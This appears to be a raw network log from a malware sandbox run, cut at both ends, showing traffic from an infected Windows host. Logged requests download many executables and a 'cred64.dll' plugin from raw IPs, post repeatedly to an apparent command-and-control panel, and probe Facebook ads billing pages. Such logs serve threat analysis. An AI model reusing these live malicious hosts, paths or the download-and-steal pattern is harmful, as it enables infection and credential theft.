Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MU66uiee8oO%2F6Au0E7kHqKrKb0bJEfOjw2PyavE%2B%2B55aWpcQAIoe1tNxV5q%2FS76bAq4gTcO73%2FTVioFOw87s0gPLDkjuOq6RSePKUIAPeGjtL7Og3WPDAoH%2BaRseTFYg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec349bb58b7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nnkxjmm.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 361
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q6SVPlrdD%2BAlkqGgk28crxT%2FB5yR38ZPpYE5mrZZdaGYpQeLspDwB8kYGzeFiwzshm2yHMSm%2Bx2s2fkrS6E7PXlbAxs0TF90oE249qBSC4HBrCa7NUzy62eXu3dm49eH"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec35028bfb7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://odtmry.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 267
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N1xgSlrgUPZiCFqiTw34gPt7Ze0jZUWhwfbqrDo3VacROKLqKzVf8t91SOv04twHbiqWI3EUpyNSh%2FEcHf8d6484UORtgRCEbnYCTLJuAjDdVcOisrf90CGRVDyJ9nSa"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec351094db7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jmbrnkoxnx.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 263
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L7Txvuz5go%2Fwdcfr%2BB5AgVYXwLJcBdPxE6yh1Q93p3wC2dJcc4QDp%2Ble%2BhTvKPfpDEHlQZZGkngKHi3GW6QfrWACZrDFVb7HpttE1879rbKg6DPsVCdYg8dK90YNm0UP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec3593f18b7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cqplkv.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 122
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B6oqq4jFh28RqtrYMstyMEm9qxcSZHUHg925ZGcZt4wteJMlaF6nFjSnYYftgbnZgY%2BNEQQQjiE1glVy3eaCz7IRepHR7r3Hy70VxrhGpCh6PSWtHNUBn6jWrL49v2KF"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec35daa0cb7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:188.114.97.0:80RequestPOST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://coqhcocdvf.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 114
Host: potunulit.org
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bBkx2egQIwJMjajtDAoHkk7nJFOcRJWehzeKnrbk999eINgZR0BZmFUMFrFNDEup%2Bhc7NZxX%2F4KBwcw%2BCJ5r5U3L%2BaY3Bwc2EbzP5cekIjQnJsK%2BVTCfNGZTO5591I%2F0"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec371f9dcb7a8-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:62.204.41.145:80RequestGET /fusa/bibar.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 62.204.41.145
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:14 GMT
Content-Type: application/octet-stream
Content-Length: 240640
Last-Modified: Fri, 30 Dec 2022 19:19:36 GMT
Connection: keep-alive
ETag: "63af39c8-3ac00"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Requestpolyzi.comIN AResponsepolyzi.comIN A95.217.49.230
-
Remote address:95.217.49.230:443RequestGET /systems/ChromeSetup.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: polyzi.com
ResponseHTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 30 Dec 2022 23:35:03 GMT
Accept-Ranges: bytes
Content-Length: 294912
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
-
Remote address:8.8.8.8:53Requestwww.isurucabs.lkIN AResponsewww.isurucabs.lkIN CNAMEisurucabs.lkisurucabs.lkIN A69.46.7.194
-
Remote address:69.46.7.194:443RequestGET /3003.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: www.isurucabs.lk
ResponseHTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 28 Dec 2022 13:39:24 GMT
Accept-Ranges: bytes
Content-Length: 1959328
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
-
Remote address:8.8.8.8:53Requestapi.2ip.uaIN AResponseapi.2ip.uaIN A162.0.217.254
-
Remote address:162.0.217.254:443RequestGET /geo.json HTTP/1.1
User-Agent: Microsoft Internet Explorer
Host: api.2ip.ua
ResponseHTTP/1.1 429 Too Many Requests
Server: Apache
Strict-Transport-Security: max-age=63072000; preload
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block; report=...
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
Upgrade: h2,h2c
Connection: Upgrade
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
-
Remote address:62.204.41.109:80RequestPOST /Nmkn5d9Dn/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.109
Content-Length: 89
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:62.204.41.109:80RequestPOST /Nmkn5d9Dn/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.109
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:62.204.41.109:80RequestPOST /Nmkn5d9Dn/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.109
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:62.204.41.109:80RequestPOST /Nmkn5d9Dn/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.109
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:62.204.41.109:80RequestPOST /Nmkn5d9Dn/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.109
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:62.204.41.109:80RequestPOST /Nmkn5d9Dn/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.109
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:62.204.41.109:80RequestPOST /Nmkn5d9Dn/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.109
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:62.204.41.109:80RequestPOST /Nmkn5d9Dn/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.109
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:62.204.41.109:80RequestPOST /Nmkn5d9Dn/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.109
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:62.204.41.109:80RequestPOST /Nmkn5d9Dn/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.109
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:62.204.41.109:80RequestPOST /Nmkn5d9Dn/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.109
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:62.204.41.109:80RequestGET /Nmkn5d9Dn/Plugins/cred64.dll HTTP/1.1
Host: 62.204.41.109
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:06:07 GMT
Content-Type: application/octet-stream
Content-Length: 129024
Last-Modified: Fri, 30 Dec 2022 19:16:17 GMT
Connection: keep-alive
ETag: "63af3901-1f800"
Accept-Ranges: bytes
-
Remote address:62.204.41.145:80RequestGET /romka/chum.exe HTTP/1.1
Host: 62.204.41.145
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:18 GMT
Content-Type: application/octet-stream
Content-Length: 179200
Last-Modified: Thu, 29 Dec 2022 09:30:27 GMT
Connection: keep-alive
ETag: "63ad5e33-2bc00"
Accept-Ranges: bytes
-
Remote address:62.204.41.145:80RequestGET /joka/portu1.exe HTTP/1.1
Host: 62.204.41.145
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:21 GMT
Content-Type: application/octet-stream
Content-Length: 417280
Last-Modified: Sat, 31 Dec 2022 00:05:02 GMT
Connection: keep-alive
ETag: "63af7cae-65e00"
Accept-Ranges: bytes
-
Remote address:62.204.41.145:80RequestGET /new/linda5.exe HTTP/1.1
Host: 62.204.41.145
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:35 GMT
Content-Type: application/octet-stream
Content-Length: 1372594
Last-Modified: Fri, 30 Dec 2022 23:51:27 GMT
Connection: keep-alive
ETag: "63af797f-14f1b2"
Accept-Ranges: bytes
-
Remote address:62.204.41.145:80RequestGET /ano/anon.exe HTTP/1.1
Host: 62.204.41.145
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:39 GMT
Content-Type: application/octet-stream
Content-Length: 179200
Last-Modified: Fri, 30 Dec 2022 21:17:25 GMT
Connection: keep-alive
ETag: "63af5565-2bc00"
Accept-Ranges: bytes
-
Remote address:62.204.41.145:80RequestGET /bosko/leman.exe HTTP/1.1
Host: 62.204.41.145
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:42 GMT
Content-Type: application/octet-stream
Content-Length: 240640
Last-Modified: Fri, 30 Dec 2022 12:01:03 GMT
Connection: keep-alive
ETag: "63aed2ff-3ac00"
Accept-Ranges: bytes
-
Remote address:62.204.41.145:80RequestGET /ano/clim.exe HTTP/1.1
Host: 62.204.41.145
ResponseHTTP/1.1 200 OK
Date: Sat, 31 Dec 2022 00:05:43 GMT
Content-Type: application/octet-stream
Content-Length: 949576
Last-Modified: Fri, 30 Dec 2022 21:17:25 GMT
Connection: keep-alive
ETag: "63af5565-e7d48"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Requestllo.eiwagggg.comIN AResponsello.eiwagggg.comIN A172.67.144.83llo.eiwagggg.comIN A104.21.63.82
-
Remote address:172.67.144.83:443RequestGET /files/lll/llpb1135.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: llo.eiwagggg.com
ResponseHTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 3648512
Connection: keep-alive
Last-Modified: Mon, 26 Dec 2022 07:12:14 GMT
ETag: "63a9494e-37ac00"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 5199
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XOSIc%2FHdZyyW2G7A3vmp%2BpHjmDTeGUoYcbfN2BiTqDMsLGJtubNin1GQ3frvVZgIjkEOp3GTxtv8FXn%2F%2FfoDWsXylJC6jF6smuhtS3aFMr2mUaIV8rOTrfEfBzduOv8nZJHV"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 781ec3528ac00a51-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestwww.facebook.comIN AResponsewww.facebook.comIN CNAMEstar-mini.c10r.facebook.comstar-mini.c10r.facebook.comIN A157.240.247.35
-
Remote address:157.240.247.35:443RequestGET /ads/manager/account_settings/account_billing HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
Host: www.facebook.com
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-prefers-color-scheme: light
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
ResponseHTTP/1.1 302 Found
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
cross-origin-resource-policy: same-origin
cross-origin-opener-policy: same-origin-allow-popups
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: 7hLRxXlMSjkJXvUIYtdNMnBJaBemiO7gwJT6mDRzpdcj50bhLesI4UMLAD13wTw3n1SiiAEmX8JyYEcDMXm/cw==
Date: Sat, 31 Dec 2022 00:05:24 GMT
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
Content-Length: 0
-
GEThttps://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingD5F9.exeRemote address:157.240.247.35:443RequestGET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
Host: www.facebook.com
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-prefers-color-scheme: light
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
ResponseHTTP/1.1 200 OK
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
x-fb-rlafr: 0
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
cross-origin-opener-policy: same-origin-allow-popups
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: b2zz1iu9KTkH4DZ15ewFGXWk+yhGFaBD9Drs6ktwA2kphKz1jcqO+6ApZnTUqQ7R5Mj2aweUrt47G71b8w9dEw==
Date: Sat, 31 Dec 2022 00:05:24 GMT
Transfer-Encoding: chunked
Alt-Svc: h3=":443"; ma=86400
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestvnk80mu7qnqnd9htump08qszs9bpm3hh.1xpom7pebdx1tmnczsg7kzfulfqlfIN AResponse
-
Remote address:8.8.8.8:53Requestwww.facebook.comIN AResponsewww.facebook.comIN CNAMEstar-mini.c10r.facebook.comstar-mini.c10r.facebook.comIN A157.240.247.35
-
Remote address:157.240.247.35:443RequestGET /ads/manager/account_settings/account_billing HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
Host: www.facebook.com
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-prefers-color-scheme: light
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
ResponseHTTP/1.1 302 Found
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
cross-origin-resource-policy: same-origin
cross-origin-opener-policy: same-origin-allow-popups
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
